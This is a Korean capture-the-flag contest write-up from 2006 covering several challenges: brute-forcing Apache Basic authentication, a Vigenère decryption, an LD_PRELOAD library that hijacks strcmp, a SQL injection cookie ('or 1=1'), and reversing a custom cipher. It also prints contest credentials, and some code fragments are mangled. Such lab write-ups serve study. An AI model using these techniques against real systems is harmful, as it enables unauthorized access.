Padocon Capture The Flag Hacking Contest Report team_name: ronny 구성원 - wooyaggo, hkpco 1. SectionA Level1 http://www.plus.or.kr/ctf/prob/c4724593d21aeccd08a4914b66ba278e SectionA Level1 : http://www.plus.or.kr/ctf/prob/c4724593d21aeccd08a4914b66ba278e /* */ http://168.188.130.240/mcthemecju/ hint1: id, password 모두영어소문자네개로이루어져있습니다. hint2: id는 body 입니다. SectionA의 level1 은아파치인증을통과하는문제입니다. 우선 http://168.188.130.240/mcthemecju/ 주소로접근을하면아파치인증창이나옵니다. `영역` 이라고되어있는부분에는 Level7 Adult Club 이라고되어있습니다. 힌트는아이디와패스워드모두영어소문자네개, 그리고 id는 body 라고되어있습니다. 약간의센스를이용하여풀자면성인클럽에서아이디는 body, 그리고 4글자로시작하는연관된단어는 good, sexy 등이있겠습니다. 추측되는것들을하나씩대입시켜보면패스워드는 sexy 인것을알수있습니다. 다른풀이는아파치인증을 Bruteforce 로푸는방법입니다.
아파치를인증할때사용하는 method는 Authorization 입니다. ( packet_capture 를하거나, rfc 를참고하면알수있습니다 ) 현재문제에서의아파치인증에서 Authorization method 의사용방법은아래와같습니다. ======================================================= Authorization: Basic ID:PASSWORD(base_64 encoding) ======================================================= C언어를이용하여 Bruteforce 를하도록코딩하였습니다. Base64 인코딩함수는인터넷에많이배포됩니다. BruteForce Program: http://hkpco.joinc.co.kr/apachebrute.c Base64_function Header: http://hkpco.joinc.co.kr/base64.h apachebrute.c 가하는일은문제서버의인증부분의패스워드를무차별대입을이용하여요청한뒤, 인증을통과하면그결과페이지를뿌려줍니다. 이제, apachebrute 를실행한뒤기다리면, 패스워드가일치했을때의결과페이지를뿌려줍니다. [hkpco@ns public_html]$ gcc o apachebrute apachebrute.c [hkpco@ns public_html]$./apachebrute Request Success! +++++++++++++++++++++++++++++ ID: body, Password: sexy +++++++++++++++++++++++++++++ HTTP/1.1 200 OK Date: Sun, 12 Feb 2006 21:14:20 GMT Server: Apache/2.2.0 (Unix) PHP/4.4.1 X Powered By: PHP/4.4.1 Content Length: 109 Content Type: text/html <HTML>
<BODY> <center> Congraturations!<br><br> Password is "YoSoSeXySeXy!" </center> </BODY> </HTML> 0//EN"> <html><head> <title>401 Authorization Required</title> </head><body> <h1>authorization Required</h1> <p>this server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p> </body></html>
2. SectionA level2 VafpdxhhwcctdpjneiqgjKtrrtwlhsipmqffmxxwiyjxvwxxvbtpBnpmjpwkqkdqnyqltnojvanujzglykhsdrxgxnpzm qpktxvwxsvedceujtggmftxzuxivanutscedubxklxqityxwhnqvafvbxybigedwljfytttscedubxqyhtruvhlttryanea nulzhynebjpmqaetpzfpwmclfqgjvhtpxhqkjuluqgigghabsceujtggmnybxjmtggoqryjbxvajrtxupttwnukzpgtyvy hztqwqwvpvhdqn 다음사이트에서 CTF( 복호화key-YHV) 를복호화한후, 문제에서주어진알파벳들과함께복호화하였습니다. http://math88.com.ne.kr/crypto/vigenere.html 복호화결과 THANKSFORAJOBWELLDONEIAMPARJONGWHOMAKESUPTHEQUESTIONIINTENDFORYOUTOSOL VETHISQUESTIONBYSEEINGHOWFREQUENTLYALPHABETAREUSEDTHISANALYSISISSOPOWERF ULTHATISWIDELYUSEDFORANALYSISOFCRYPTOGRAMWHICHISSUFFICIENTLYLONGANDHASAO NETOONECORESSPONDENCYINALPHABETIWISHTOENJOYTHISTHEPASSWORDISRUNNOWCTFGO ODLUCKTOYOU 제일마지막문장 THEPASSWORDISRUNNOWCTFGOODLUCKTOYOU을띄워쓰기로나타내면 THE PASS WORD IS RUNNOWCTF GOOD LUCK TO YOU SectionA-level2의패스워드는 runnowctf
3. SectionB level1 로그인 : flag flag@141.223.175.220 의비밀번호: flagthewind Last login: Mon Feb 6 01:09:37 2006 from 211.200.19.124 공지 : 기타작업은 /tmp밑에다가해주세요 [flag@rh73 flag]$ ls prob [flag@rh73 flag]$ cd prob/ [flag@rh73 prob]$ ls ctf_sf [flag@rh73 prob]$ ls l ctf_sf rwx x x 2 root root 13677 2월 4 10:16 ctf_sf LD_PRELOAD를이용해서 Read권한이없는실행파일의특정함수를 Hijack [flag@rh73.ronny]$ cat lib.c #include <dlfcn.h> int strcmp(const char *s1, const char *s2) { return 0; [flag@rh73.ronny]$ gcc fpic lib.c shared o lib.so [flag@rh73.ronny]$ ls a.out ctf_sf lib.c lib.so
Who is He???? [flag@rh73.ronny]$ cat test.c #include <stdio.h> int main() { int i; for ( i=0; i<9999;i++){ system("cp /home/flag/prob/.passwordfile."); return 0;
4. SectionB level2
r_num은항상 1234 로설정, r_nick 은 내가입력한별명 값 아무결과도안뜸 GET /madcow/list.php HTTP/1.1 Accept: image/gif, image/x xbitmap, image/jpeg, image/pjpeg, application/x shockwave flash, application/vnd.ms excel, application/vnd.ms powerpoint, application/msword, */* Referer: http://168.188.130.239/madcow/index.php Accept Language: ko Accept Encoding: gzip, deflate User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; (R1 1.5);.NET CLR 1.0.3705) Host: 168.188.130.239 Connection: Keep Alive Cookie: r_num=' or 1=1 ; r_nick=1;
*********************************************** your information : 이름 : levelpass 별명 : TooQooPoo0101 Secret Code : 1234 ***********************************************
5. SectionC level1 리버싱을통해암호화루틴과암호인증방식을분석하여암호화코드및인증스트링을분석했다. Enc.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include "dumpcode.h" int main (int argc, char *argv[]) { char *enc_passwd, *data=argv[1]; int len, cur, remainder; if(argc!=2){ printf("<usage> : %s string\n",argv[0]); return 1;
len=strlen(data); cur=len 1; enc_passwd = (char *)malloc(len+1); memset((void *)enc_passwd,0x00, len+1); for( ; cur>=0; cur ) { remainder = data[cur] % len; while(enc_passwd[remainder]!=0x00) { printf("%d\n",cur); remainder=(remainder+1) % len; enc_passwd[remainder] = data[cur] ^ remainder; dumpcode (enc_passwd,len+1); printf("%s",enc_passwd); free(enc_passwd); return 0; pyppw`c t`cg fn nh bdcp 6rca0 이런식으로 6 개의암호화된단어가붙어있다. 기존의암호화리버싱한것을통해서복호화프로그램제작만듬. Dec.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include "dumpcode.h"
char *encrypt(char *string) { // 암호화함수, return값 free 필요 char *enc_passwd, *data=string; int len, cur, remainder; len=strlen(data); enc_passwd = (char *)malloc(len+1); memset((void *)enc_passwd,0x00, len+1); for(cur=len1;cur>=0;cur ){ remainder = data[cur] % len; while(enc_passwd[remainder]!=0x00) { remainder=(remainder+1) % len; enc_passwd[remainder] = data[cur] ^ remainder; return enc_passwd; int main(int argc, char *argv[]) { char *enc_string=argv[1]; char *dec_string; int cur, nst; // nst = n번째문자비교중 char ch, *enc_data; // enc_data = dec_string 암호화한문자열 if(argc!=2) { printf("<usage> : %s <encrypt password> n",argv[0]); return 1; dec_string=malloc(strlen(argv[1]));
memset(dec_string, 0x20, strlen(argv[1])); dec_string[ strlen(argv[1]) 1 ] = 0x00; printf("enc_string length is %d n", strlen(enc_string)); for(cur=strlen(enc_string) 1;cur>=0;cur ) { nst=strlen(enc_string) cur; for(ch=0x20;ch<=0x7e;ch++) { dec_string[cur]=ch; enc_data=encrypt(dec_string); #ifdef DEBUG printf(" npassword is [%s] n",enc_data); printf("data is [%s] n",dec_string); printf("nstis%d n",nst); #endif if(strncmp(enc_data,enc_string,nst)==0) { printf("%dst character is '%c' n", nst, ch); free(enc_data); break; free(enc_data); printf("encrypt string is [%s] n", dec_string); return 0;
6. SectionC level3 패킷캡쳐를통해서어떻게패킷이나가는지확인하고파일명만수정해서 Cli.c #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> /* close */ #include <string.h> #define SERVER_PORT 7979 int sockfd; void error(char *string) { fprintf(stderr,"%s error \n",string); close(sockfd); exit(1);
int main(int argc, char *argv[]) { int cc; // connect checker struct sockaddr_in con_sock; char str[256]; char segment[100]; sockfd=socket(af_inet, SOCK_STREAM, IPPROTO_TCP); if(sockfd<0) { fprintf(stderr,"socket() error \n"); exit(1); con_sock.sin_addr.s_addr = inet_addr("168.188.130.240"); con_sock.sin_family = AF_INET; con_sock.sin_port = htons(server_port); cc=connect(sockfd,(struct sockaddr *)&con_sock, sizeof(con_sock)); if(cc < 0) error("socket()"); cc=send(sockfd, "ARE YOU LIVING IN THE REAL WORLD?", strlen("are YOU LIVING IN THE REAL WORLD?"), 0); if(cc<0) error("send()"); cc=send(sockfd, argv[1], strlen(argv[1]), 0);
cc=recv(sockfd,str,255,0); printf("%s",str); return 0;./cli./real_data.txt ================================================= You've got a real word. Congraturations!!! The P4ssw0rd is "Unlimited Ru1es!" =================================================
2. SectionC level3 시리얼생성문제입니다. 풀다가남겨둔자료가없어서;; 적당히암호비교루틴부분에 break를걸고레지스터에있는 16진수값을 10 진수로해석하니시리얼을구할수있었습니다. Port 우회루틴은구현하지않았습니다; 바로웹페이지인증에서암호를넣으니통과되더라구요^^